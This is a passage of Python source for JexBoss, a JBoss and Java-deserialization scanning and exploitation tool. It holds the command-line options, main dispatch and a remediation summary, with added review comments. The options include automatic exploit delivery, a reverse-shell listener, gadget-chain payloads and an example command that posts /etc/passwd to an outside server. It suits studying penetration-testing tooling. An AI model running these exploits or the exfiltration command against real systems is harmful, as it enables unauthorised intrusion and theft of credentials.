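            print_and_flush(RED + BOLD + " ** Check more information on file {0} **".format(gl_args.results) + ENDC)

        print_and_flush(GREEN + " ---------------------------------------------------------------------------------\n"
                        + BOLD + " Recommendations: \n" + ENDC +
                        GREEN + " - Remove web consoles and services that are not used, eg:\n"
                        " $ rm web-console.war http-invoker.sar jmx-console.war jmx-invoker-adaptor-server.sar admin-console.war\n"
                        " - Use a reverse proxy (eg. nginx, apache, F5)\n"
                        " - Limit access to the server only via reverse proxy (eg. DROP INPUT POLICY)\n"
                        " - Search vestiges of exploitation within the directories \"deploy\" and \"management\".\n"
                        " - Do NOT TRUST serialized objects received from the user\n"
                        " - If possible, stop using serialized objects as input!\n"
                        " - If you need to work with serialization, consider migrating to the Gson lib.\n"
                        " - Use a strict whitelist with Look-ahead[3] before deserialization\n"
                        " - For a quick (but not definitive) remediation for the viewState input, store the state \n"
                        " of the view components on the server (this will increase the heap memory consumption): \n"
                        " In web.xml, change the \"client\" parameter to \"server\" on STATE_SAVING_METHOD.\n"
                        " - Upgrade Apache Struts: https://cwiki.apache.org/confluence/display/WW/S2-045\n"
                        "\n References:\n"
                        " [1] - https://developer.jboss.org/wiki/SecureTheJmxConsole\n"
                        " [2] - https://issues.jboss.org/secure/attachment/12313982/jboss-securejmx.pdf\n"
                        " [3] - https://www.ibm.com/developerworks/library/se-lookahead/\n"
                        " [4] - https://www.owasp.org/index.php/Deserialization_of_untrusted_data\n"
                        "\n"
                        " - If possible, discard this server!\n"
                        " ---------------------------------------------------------------------------------")
    else:
        print_and_flush(GREEN + "\n\n * Results: \n" +
                        " The server is not vulnerable to bugs tested ... :D\n" + ENDC)

    # infos
    print_and_flush(ENDC + " * Info: review, suggestions, updates, etc: \n" +
                    " https://github.com/joaomatosf/jexboss\n")

    print_and_flush(GREEN + BOLD + " * DONATE: " + ENDC + "Please consider making a donation to help improve this tool,\n" +
                    GREEN + BOLD + " * Bitcoin Address: " + ENDC + " 14x4niEpfp7CegBYr3tTzTn4h6DAnDCD9C \n")

    print_and_flush(ENDC)


def main():
    """
    Run interactively. Call when the module is run by itself.

    Flow: optional self-update check, then the mode selected by -mode
    (standalone / auto-scan / file-scan), then the summary. Scan modes write
    their report to -results / -out. Returns None; exit codes are only produced
    by the self-update path.
    """
    _maybe_self_update()

    vulnerables = False
    if gl_args.mode == 'standalone':
        url = gl_args.host
        scan_results = check_vul(url)
        # exploitation is offered/performed per vector that came back 200/500
        for vector in scan_results:
            if scan_results[vector] in (200, 500):
                vulnerables = True
                _exploit_standalone(url, vector)

    elif gl_args.mode == 'auto-scan':
        vulnerables = _run_auto_scan()

    elif gl_args.mode == 'file-scan':
        vulnerables = _run_file_scan()

    _print_summary(vulnerables)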
1033 |
1034 | #banner()
1035 |
1036 |
1037 | if __name__ == "__main__":
1038 |
1039 |
1040 | parser = argparse.ArgumentParser(
1041 | formatter_class=argparse.RawDescriptionHelpFormatter,
1042 | #description="JexBoss v%s: JBoss verify and EXploitation Tool" %__version,
1043 | description=textwrap.dedent(RED1 +
1044 | "\n # --- JexBoss: Jboss verify and EXploitation Tool --- #\n"
1045 | " | And others Java Deserialization Vulnerabilities | \n"
1046 | " | |\n"
1047 | " | @author: João Filho Matos Figueiredo |\n"
1048 | " | @contact: joaomatosf@gmail.com |\n"
1049 | " | |\n"
1050 | " | @updates: https://github.com/joaomatosf/jexboss |\n"
1051 | " #______________________________________________________#\n"
1052 | " @version: " + __version__ + "\n" + help_usage()),
1053 | epilog="",
1054 | prog="JexBoss"
1055 | )
1056 |
1057 | group_standalone = parser.add_argument_group('Standalone mode')
1058 | group_advanced = parser.add_argument_group('Advanced Options (USE WHEN EXPLOITING JAVA UNSERIALIZE IN APP LAYER)')
1059 | group_auto_scan = parser.add_argument_group('Auto scan mode')
1060 | group_file_scan = parser.add_argument_group('File scan mode')
1061 |
1062 | # optional parameters ---------------------------------------------------------------------------------------
1063 | parser.add_argument('--version', action='version', version='%(prog)s ' + __version__)
1064 | parser.add_argument("--auto-exploit", "-A", help="Send exploit code automatically (USE ONLY IF YOU HAVE PERMISSION!!!)",
1065 | action='store_true')
1066 | parser.add_argument("--disable-check-updates", "-D", help="Disable two updates checks: 1) Check for updates "
1067 | "performed by the webshell in exploited server at http://webshell.jexboss.net/jsp_version.txt and 2) check for updates "
1068 | "performed by the jexboss client at http://joaomatosf.com/rnp/releases.txt",
1069 | action='store_true')
# Command-line surface of the scanner. Everything below is argparse wiring; the
# parser and the `group_*` argument groups are created above this block.
# Several options carry secrets (proxy credentials, JBoss login, session
# cookies). Anything passed on the command line is visible to other local
# users via process listings and is kept in shell history -- treat these as
# disclosed once typed; prefer a throwaway shell or a wrapper that reads them
# from the environment / a file if that matters for the engagement.
parser.add_argument('-mode', help="Operation mode (DEFAULT: standalone)", choices=['standalone', 'auto-scan', 'file-scan'], default='standalone')
parser.add_argument("--app-unserialize", "-j",
                    help="Check for java unserialization vulnerabilities in HTTP parameters (eg. javax.faces.ViewState, "
                         "oldFormData, etc)", action='store_true')
parser.add_argument("--servlet-unserialize", "-l",
                    help="Check for java unserialization vulnerabilities in Servlets (like Invoker interfaces)",
                    action='store_true')
# Vector selectors: each restricts the run to one product's checks.
parser.add_argument("--jboss", help="Check only for JBOSS vectors.", action='store_true')
parser.add_argument("--jenkins", help="Check only for Jenkins CLI vector (CVE-2015-5317).", action='store_true')
parser.add_argument("--struts2", help="Check only for Struts2 Jakarta Multipart parser (CVE-2017-5638).", action='store_true')
# Opt-in only (see help text): the JMX check is skipped unless this flag is set.
parser.add_argument("--jmxtomcat", help="Check JMX JmxRemoteLifecycleListener in Tomcat (CVE-2016-8735 and "
                                        "CVE-2016-3427). OBS: Will not be checked by default.", action='store_true')

parser.add_argument('--proxy', "-P", help="Use a http proxy to connect to the target URL (eg. -P http://192.168.0.1:3128)", )
# Secret on the command line (see note at top of block).
parser.add_argument('--proxy-cred', "-L", help="Proxy authentication credentials (eg -L name:password)", metavar='LOGIN:PASS')
# Defaults to the vendor default credential pair; whatever consumes this value
# (the JBoss 5/6 admin-console exploit, defined elsewhere) will therefore try
# admin:admin when the operator gives nothing. Also a secret on the command line.
parser.add_argument('--jboss-login', "-J", help="JBoss login and password for exploit admin-console in JBoss 5 and JBoss 6 "
                                                "(default: admin:admin)", metavar='LOGIN:PASS', default='admin:admin')
parser.add_argument('--timeout', help="Seconds to wait before timeout connection (default 3)", default=3, type=int)

# Session cookies are live authentication material; same exposure as above.
# NOTE(review): the example in the help text says `--cookie` but the option is
# `--cookies` -- the help string should be corrected to match.
parser.add_argument('--cookies', help="Specify cookies for Struts 2 Exploit. Use this to test features that require authentication. "
                                      "Format: \"NAME1=VALUE1; NAME2=VALUE2\" (eg. --cookie \"JSESSIONID=24517D9075136F202DCE20E9C89D424D\""
                    , type=str, metavar='NAME=VALUE')
#parser.add_argument('--retries', help="Retries when the connection timeouts (default 3)", default=3, type=int)

# advanced parameters ---------------------------------------------------------------------------------------
# Reverse-shell listener address that gets baked into the deserialization payload.
group_advanced.add_argument("--reverse-host", "-r", help="Remote host address and port for reverse shell when exploiting "
                                                         "Java Deserialization Vulnerabilities in application layer "
                                                         "(for now, working only against *nix systems)"
                                                         "(eg. 192.168.0.10:1331)", type=str, metavar='RHOST:RPORT')
# Arbitrary command executed on the target. The example exfiltrates /etc/passwd
# over plaintext HTTP -- fine as an illustration, but on a real engagement use
# a listener you control and a transport appropriate to the rules of engagement.
group_advanced.add_argument("--cmd", "-x",
                            help="Send specific command to run on target (eg. curl -d @/etc/passwd http://your_server)"
                            , type=str, metavar='CMD')
# Name to be resolved by the target when the "dns" gadget fires (out-of-band
# confirmation). NOTE(review): metavar 'URL' is misleading; this is a DNS name.
group_advanced.add_argument("--dns", help="Specifies the dns query for use with \"dns\" Gadget", type=str, metavar='URL')
# NOTE(review): help text is garbled ("rWINDOWS System$"); should read
# "Specifies that the commands are for Windows systems (cmd.exe)".
group_advanced.add_argument("--windows", "-w", help="Specifies that the commands are for rWINDOWS System$ (cmd.exe)",
                            action='store_true')
# Name of the POST parameter whose value is replaced with the serialized gadget.
group_advanced.add_argument("--post-parameter", "-H", help="Specify the parameter to find and inject serialized objects into it."
                                                           " (egs. -H javax.faces.ViewState or -H oldFormData (<- Hi PayPal =X) or others)"
                                                           " (DEFAULT: javax.faces.ViewState)",
                            default='javax.faces.ViewState', metavar='PARAMETER')
group_advanced.add_argument("--show-payload", "-t", help="Print the generated payload.",
                            action='store_true')
# Gadget chain selection; 'dns' is the non-executing, DNS-callback variant and
# requires --dns (enforced after parse_args, below this block).
group_advanced.add_argument("--gadget", help="Specify the type of Gadget to generate the payload automatically."
                                             " (DEFAULT: commons-collections3.1 or groovy1 for JenKins)",
                            choices=['commons-collections3.1', 'commons-collections4.0', 'jdk7u21', 'jdk8u20', 'groovy1', 'dns'],
                            default='commons-collections3.1')
# Operator-supplied serialized object read from disk; how it is loaded and
# sent is implemented elsewhere in this file.
group_advanced.add_argument("--load-gadget", help="Provide your own gadget from file (a java serialized object in RAW mode)",
                            metavar='FILENAME')
# Blind delivery: payloads are fired at the given URL in several encodings
# without a prior fingerprint. Noisy and potentially disruptive -- only within
# an authorised scope.
group_advanced.add_argument("--force", "-F",
                            help="Force send java serialized gadgets to URL informed in -u parameter. This will "
                                 "send the payload in multiple formats (eg. RAW, GZIPED and BASE64) and with "
                                 "different Content-Types.",action='store_true')

# required parameters ---------------------------------------------------------------------------------------
group_standalone.add_argument("-host", "-u", help="Host address to be checked (eg. -u http://192.168.0.10:8080)",
                              type=str)

# scan's mode parameters ---------------------------------------------------------------------------------------
# NOTE(review): auto-scan has a non-empty default target range, so
# `-mode auto-scan` with no -network sweeps 192.168.0.0/24 unasked. Consider
# making -network mandatory in that mode to avoid accidental out-of-scope scans.
group_auto_scan.add_argument("-network", help="Network to be checked in CIDR format (eg. 10.0.0.0/8)",
                             type=network_args, default='192.168.0.0/24')
group_auto_scan.add_argument("-ports", help="List of ports separated by commas to be checked for each host "
                                            "(eg. 8080,8443,8888,80,443)", type=str, default='8080,80')
# Result logs default to the current working directory; they identify targets
# and findings, so handle them like any other engagement artefact.
group_auto_scan.add_argument("-results", help="File name to store the auto scan results", type=str,
                             metavar='FILENAME', default='jexboss_auto_scan_results.log')

group_file_scan.add_argument("-file", help="Filename with host list to be scanned (one host per line)",
                             type=str, metavar='FILENAME_HOSTS')
group_file_scan.add_argument("-out", help="File name to store the file scan results", type=str,
                             metavar='FILENAME_RESULTS', default='jexboss_file_scan_results.log')
# Parse the command line into the module-level `gl_args` namespace that the
# rest of the tool reads.
gl_args = parser.parse_args()

# Mode-specific required arguments are enforced by hand because argparse groups
# cannot express "required only in this mode": standalone needs a host,
# file-scan needs an input file, and the dns gadget needs a name to resolve.
if (gl_args.mode == 'standalone' and gl_args.host is None) or \
   (gl_args.mode == 'file-scan' and gl_args.file is None) or \
   (gl_args.gadget == 'dns' and gl_args.dns is None):
    banner()
    print (help_usage())
    # NOTE(review): a usage error exits with status 0, so a wrapper script
    # cannot tell "bad invocation" from "ran and found nothing"; argparse's
    # own convention is exit status 2. `exit` here is the `site` builtin
    # (absent under `python -S`); `sys.exit` would be the robust choice.
    exit(0)
else:
    # Order matters: the shared HTTP pool must exist before it is handed to
    # the update checker and the exploit module, and the proxy is validated
    # before any target traffic is sent by main().
    configure_http_pool()
    # The update check (see the update-check option's help text above) goes
    # through the same pool as target traffic; the TLS/proxy settings of that
    # pool therefore apply to it too.
    _updates.set_http_pool(gl_http_pool)
    _exploits.set_http_pool(gl_http_pool)
    banner()
    # Refuse to run rather than silently fall back to a direct connection when
    # the operator asked for a proxy that does not work.
    if gl_args.proxy and not is_proxy_ok():
        exit(1)
    # For the dns gadget the "command" slot carries the name to resolve.
    if gl_args.gadget == 'dns': gl_args.cmd = gl_args.dns
    main()
1156 |
# Test-harness entry point. The interpreter never sets __name__ to this value
# itself; presumably a harness imports/runs this module with that name set
# (e.g. runpy with run_name='__testing__') -- TODO confirm against the tests.
if __name__ == '__testing__':
    # Browser-like default headers with a randomised User-Agent. Nothing in
    # this block reads `headers`; whether anything else does is outside view.
    headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
               "Connection": "keep-alive",
               "User-Agent": get_random_user_agent()}

    timeout = Timeout(connect=1.0, read=3.0)
    # cert_reqs='CERT_NONE' disables TLS certificate verification for every
    # request made through this pool. That is the usual trade-off for probing
    # targets with self-signed certs, but it also means any non-target
    # connection routed through the same pool can be intercepted undetected.
    gl_http_pool = PoolManager(timeout=timeout, cert_reqs='CERT_NONE')
    _exploits.set_http_pool(gl_http_pool)
1165 |
1166 |
1167 |
--------------------------------------------------------------------------------